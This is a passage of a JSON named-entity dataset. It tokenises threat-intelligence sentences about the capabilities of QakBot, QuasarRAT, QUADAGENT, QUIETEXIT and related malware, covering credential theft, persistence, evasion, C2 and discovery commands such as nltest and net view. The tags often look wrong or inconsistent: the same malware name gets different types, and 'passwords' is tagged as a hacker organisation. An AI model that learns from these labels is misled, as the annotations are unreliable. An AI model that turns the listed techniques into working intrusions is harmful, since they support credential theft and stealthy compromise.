"B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "QUADAGENT", "used", "the", "PowerShell", "filenames", "<code>Office365DCOMCheck.ps1</code>", "and", "<code>SystemDiskClean.ps1</code>." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "QUADAGENT", "modifies", "an", "HKCU", "Registry", "key", "to", "store", "a", "session", "identifier", "unique", "to", "the", "compromised", "system", "as", "well", "as", "a", "pre-shared", "key", "used", "for", "encrypting", "and", "decrypting", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUADAGENT", "uses", "PowerShell", "scripts", "for", "execution." ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "QUADAGENT", "checks", "if", "a", "value", "exists", "within", "a", "Registry", "key", "in", "the", "HKCU", "hive", "whose", "name", "is", "the", "same", "as", "the", "scheduled", "task", "it", "has", "created." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUADAGENT", "creates", "a", "scheduled", "task", "to", "maintain", "persistence", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "QUADAGENT", "encodes", "C2", "communications", "with", "base64." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUADAGENT", "gathers", "the", "current", "domain", "the", "victim", "system", "belongs", "to." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUADAGENT", "gathers", "the", "victim", "username." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O" ] }, { "tokens": [ "QUADAGENT", "uses", "VBScripts." ], "ner_tags": [ "B-Idus", "O", "B-Way" ] }, { "tokens": [ "QUADAGENT", "uses", "HTTPS", "and", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "QUADAGENT", "uses", "cmd.exe", "to", "execute", "scripts", "and", "commands", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUIETCANARY", "has", "the", "ability", "to", "stage", "data", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUIETCANARY", "can", "use", "a", "custom", "parsing", "routine", "to", "decode", "the", "command", "codes", "and", "additional", "parameters", "from", "the", "C2", "before", "executing", "them." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUIETCANARY", "can", "execute", "processes", "in", "a", "hidden", "window." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "QUIETCANARY", "can", "call", "`System.Net.HttpWebRequest`", "to", "identify", "the", "default", "proxy", "configured", "on", "the", "victim", "computer." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUIETCANARY", "has", "the", "ability", "to", "retrieve", "information", "from", "the", "Registry." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "QUIETCANARY", "can", "base64", "encode", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "QUIETCANARY", "can", "RC4", "encrypt", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUIETCANARY", "can", "identify", "the", "default", "proxy", "setting", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUIETCANARY", "can", "use", "HTTPS", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "QUIETEXIT", "can", "use", "an", "inverse", "negotiated", "SSH", "connection", "as", "part", "of", "its", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Way", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUIETEXIT", "can", "proxy", "traffic", "via", "SOCKS." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "B-Way" ] }, { "tokens": [ "QUIETEXIT", "can", "attempt", "to", "connect", "to", "a", "second", "hard-coded", "C2", "if", "the", "first", "hard-coded", "C2", "address", "fails." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUIETEXIT", "has", "attempted", "to", "change", "its", "name", "to", "`cron`", "upon", "startup.", "During", "incident", "response,", "QUIETEXIT", "samples", "have", "been", "identified", "that", "were", "renamed", "to", "blend", "in", "with", "other", "legitimate", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUIETEXIT", "can", "establish", "a", "TCP", "connection", "as", "part", "of", "its", "initial", "connection", "to", "the", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "has", "the", "ability", "to", "enumerate", "windows", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "use", "large", "file", "sizes", "to", "evade", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "use", "advanced", "web", "injects", "to", "steal", "web", "banking", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "QakBot", "can", "conduct", "brute", "force", "attacks", "to", "capture", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "B-Purp", "O" ] }, { "tokens": [ "QakBot", "can", "use", "signed", "loaders", "to", "evade", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "use", "obfuscated", "and", "encoded", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "QakBot", "has", "collected", "usernames", "and", "passwords", "from", "Firefox", "and", "Chrome." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "QakBot", "has", "the", "ability", "to", "use", "DLL", "side-loading", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "use", "a", "variety", "of", "commands,", "including", "esentutl.exe", "to", "steal", "sensitive", "data", "from", "Internet", "Explorer", "and", "Microsoft", "Edge,", "to", "acquire", "information", "that", "is", "subsequently", "exfiltrated." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "deobfuscate", "and", "re-assemble", "code", "strings", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "has", "the", "ability", "to", "modify", "the", "Registry", "to", "add", "its", "binaries", "to", "the", "Windows", "Defender", "exclusion", "list." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "use", "domain", "generation", "algorithms", "in", "C2", "communication." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "run", "<code>nltest", "/domain_trusts", "/all_trusts</code>", "for", "domain", "trust", "discovery." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "send", "stolen", "information", "to", "C2", "nodes", "including", "passwords,", "accounts,", "and", "emails." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "QakBot", "can", "move", "laterally", "using", "worm-like", "functionality", "through", "exploitation", "of", "SMB." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "QakBot", "has", "a", "module", "that", "can", "proxy", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "delete", "folders", "and", "files", "including", "overwriting", "its", "executable", "with", "legitimate", "programs." ], "ner_tags": [ "B-Way", "O", "B-Features", "B-HackOrg", "I-Features", "I-Features", "O", "B-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "identify", "whether", "it", "has", "been", "run", "previously", "on", "a", "host", "by", "checking", "for", "a", "specified", "folder." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "store", "its", "configuration", "information", "in", "a", "randomly", "named", "subkey", "under", "<code>HKCU\\Software\\Microsoft</code>." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "has", "been", "delivered", "in", "ZIP", "files", "via", "HTML", "smuggling." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "QakBot", "has", "placed", "its", "payload", "in", "hidden", "subdirectories." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "make", "small", "changes", "to", "itself", "in", "order", "to", "change", "its", "checksum", "and", "hash", "value." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "has", "the", "ability", "to", "download", "additional", "components", "and", "malware." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "B-Features" ] }, { "tokens": [ "QakBot", "can", "measure", "the", "download", "speed", "on", "a", "targeted", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "QakBot", "web", "inject", "module", "can", "inject", "Java", "Script", "into", "web", "banking", "pages", "visited", "by", "the", "victim." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "capture", "keystrokes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "has", "stored", "stolen", "emails", "and", "other", "data", "into", "new", "folders", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "target", "and", "steal", "locally", "stored", "emails", "to", "support", "thread", "hijacking", "phishing", "campaigns." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "B-Features", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "QakBot", "can", "use", "<code>net", "localgroup</code>", "to", "enable", "discovery", "of", "local", "groups." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "has", "gained", "execution", "through", "users", "opening", "malicious", "attachments." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "QakBot", "has", "gained", "execution", "through", "users", "opening", "malicious", "links." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "has", "been", "packaged", "in", "ISO", "files", "in", "order", "to", "bypass", "Mark", "of", "the", "Web", "(MOTW)", "security", "measures." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "QakBot", "payload", "has", "been", "disguised", "as", "a", "PNG", "file", "and", "hidden", "within", "LNK", "files", "using", "a", "Microsoft", "File", "Explorer", "icon." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "modify", "the", "Registry", "to", "store", "its", "configuration", "information", "in", "a", "randomly", "named", "subkey", "under", "<code>HKCU\\Software\\Microsoft</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "use", "MSIExec", "to", "spawn", "multiple", "cmd.exe", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "QakBot", "can", "use", "<code>GetProcAddress</code>", "to", "help", "delete", "malicious", "strings", "from", "memory." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "B-Features", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "use", "<code>net", "share</code>", "to", "identify", "network", "shares", "for", "use", "in", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "has", "the", "ability", "use", "TCP", "to", "send", "or", "receive", "C2", "packets." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "QakBot", "has", "hidden", "code", "within", "Excel", "spreadsheets", "by", "turning", "the", "font", "color", "to", "white", "and", "splitting", "it", "across", "multiple", "cells." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "identify", "peripheral", "devices", "on", "targeted", "systems." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "use", "PowerShell", "to", "download", "and", "execute", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "has", "the", "ability", "to", "check", "running", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "QakBot", "can", "use", "process", "hollowing", "to", "execute", "its", "main", "payload." ], "ner_tags": [ "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "inject", "itself", "into", "processes", "including", "explore.exe,", "Iexplore.exe,", "Mobsync.exe.,", "and", "wermgr.exe." ], "ner_tags": [ "B-Way", "O", "B-Way", "I-Way", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "The", "QakBot", "proxy", "module", "can", "encapsulate", "SOCKS5", "protocol", "within", "its", "own", "proxy", "protocol." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "maintain", "persistence", "by", "creating", "an", "auto-run", "Registry", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "use", "Regsvr32", "to", "execute", "malicious", "DLLs." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "identify", "remote", "systems", "through", "the", "<code>net", "view</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "has", "the", "ability", "to", "use", "removable", "drives", "to", "spread", "through", "compromised", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Features", "B-Purp", "B-Features", "O" ] }, { "tokens": [ "QakBot", "has", "used", "Rundll32.exe", "to", "drop", "malicious", "DLLs", "including", "Brute", "Ratel", "C4", "and", "to", "enable", "C2", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "has", "the", "ability", "to", "create", "scheduled", "tasks", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "QakBot", "can", "identify", "the", "installed", "antivirus", "product", "on", "a", "targeted", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "enumerate", "a", "list", "of", "installed", "programs." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "QakBot", "can", "encrypt", "and", "pack", "malicious", "payloads." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "B-HackOrg", "O" ] }, { "tokens": [ "QakBot", "has", "spread", "through", "emails", "with", "malicious", "attachments." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "has", "spread", "through", "emails", "with", "malicious", "links." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "Base64", "encode", "system", "information", "sent", "to", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "has", "the", "ability", "to", "capture", "web", "session", "cookies." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "QakBot", "can", "RC4", "encrypt", "strings", "in", "C2", "communication." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "check", "the", "compromised", "host", "for", "the", "presence", "of", "multiple", "executables", "associated", "with", "analysis", "tools", "and", "halt", "execution", "if", "any", "are", "found." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "collect", "system", "information", "including", "the", "OS", "version", "and", "domain", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "use", "<code>net", "config", "workstation</code>,", "<code>arp", "-a</code>,", "`nslookup`,", "and", "<code>ipconfig", "/all</code>", "to", "gather", "network", "configuration", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "QakBot", "can", "use", "<code>netstat</code>", "to", "enumerate", "current", "network", "connections." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "identify", "the", "user", "name", "on", "a", "compromised", "system." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "identify", "the", "system", "time", "on", "a", "targeted", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "QakBot", "dropper", "can", "delay", "dropping", "the", "payload", "to", "evade", "detection." ], "ner_tags": [ "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "use", "VBS", "to", "download", "and", "execute", "malicious", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "QakBot", "has", "the", "ability", "to", "use", "HTTP", "and", "HTTPS", "in", "communication", "with", "C2", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "use", "cmd.exe", "to", "launch", "itself", "and", "to", "execute", "multiple", "C2", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QakBot", "can", "execute", "WMI", "queries", "to", "gather", "information." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "QakBot", "can", "remotely", "create", "a", "temporary", "service", "on", "a", "target", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "can", "generate", "a", "UAC", "pop-up", "Window", "to", "prompt", "the", "target", "user", "to", "run", "a", "command", "as", "the", "administrator." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "QuasarRAT", ".dll", "file", "is", "digitally", "signed", "by", "a", "certificate", "from", "AirVPN." ], "ner_tags": [ "O", "B-SamFile", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "can", "obtain", "passwords", "from", "FTP", "clients." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "can", "obtain", "passwords", "from", "common", "FTP", "clients." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "can", "obtain", "passwords", "from", "common", "web", "browsers." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "can", "retrieve", "files", "from", "compromised", "client", "machines." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "has", "the", "ability", "to", "set", "file", "attributes", "to", "\"hidden\"", "to", "hide", "files", "from", "the", "compromised", "user's", "view", "in", "Windows", "File", "Explorer." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "can", "hide", "process", "windows", "and", "make", "web", "requests", "invisible", "to", "the", "compromised", "user.", "Requests", "marked", "as", "invisible", "have", "been", "sent", "with", "user-agent", "string", "`Mozilla/5.0", "(Macintosh;", "Intel", "Mac", "OS", "X", "10_9_3)", "AppleWebKit/537.75.14", "(KHTML,", "like", "Gecko)", "Version/7.0.3", "Safari/7046A194A`", "though", "QuasarRAT", "can", "only", "be", "run", "on", "Windows", "systems." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "can", "download", "files", "to", "the", "victim’s", "machine", "and", "execute", "them." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "has", "a", "built-in", "keylogger." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way" ] }, { "tokens": [ "QuasarRAT", "has", "a", "command", "to", "edit", "the", "Registry", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "can", "use", "TCP", "for", "C2", "communication." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "can", "use", "port", "4782", "on", "the", "compromised", "host", "for", "TCP", "callbacks." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "can", "communicate", "over", "a", "reverse", "proxy", "using", "SOCKS5." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "If", "the", "QuasarRAT", "client", "process", "does", "not", "have", "administrator", "privileges", "it", "will", "add", "a", "registry", "key", "to", "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`", "for", "persistence." ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "has", "a", "module", "for", "performing", "remote", "desktop", "access." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "contains", "a", ".NET", "wrapper", "DLL", "for", "creating", "and", "managing", "scheduled", "tasks", "for", "maintaining", "persistence", "upon", "reboot." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "B-SecTeam", "B-SecTeam", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "uses", "AES", "with", "a", "hardcoded", "pre-shared", "key", "to", "encrypt", "network", "communication." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "QuasarRAT", "can", "gather", "system", "information", "from", "the", "victim’s", "machine", "including", "the", "OS", "type." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "can", "determine", "the", "country", "a", "victim", "host", "is", "located", "in." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "has", "the", "ability", "to", "enumerate", "the", "Wide", "Area", "Network", "(WAN)", "IP", "through", "requests", "to", "ip-api[.]com,", "freegeoip[.]net,", "or", "api[.]ipify[.]org", "observed", "with", "user-agent", "string", "`Mozilla/5.0", "(Windows", "NT", "6.3;", "rv:48.0)", "Gecko/20100101", "Firefox/48.0`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "QuasarRAT", "can", "enumerate", "the", "username", "and", "account", "type." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "can", "perform", "webcam", "viewing." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "QuasarRAT", "can", "launch", "a", "remote", "shell", "to", "execute", "commands", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuietSieve", "can", "collect", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "QuietSieve", "can", "search", "files", "on", "the", "target", "host", "by", "extension,", "including", "doc,", "docx,", "xls,", "rtf,", "odt,", "txt,", "jpg,", "pdf,", "rar,", "zip,", "and", "7z." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "O", "B-Way" 